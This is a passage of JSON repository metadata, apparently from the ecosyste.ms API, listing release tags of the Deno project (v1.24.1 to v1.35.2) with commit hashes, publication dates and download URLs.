positories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms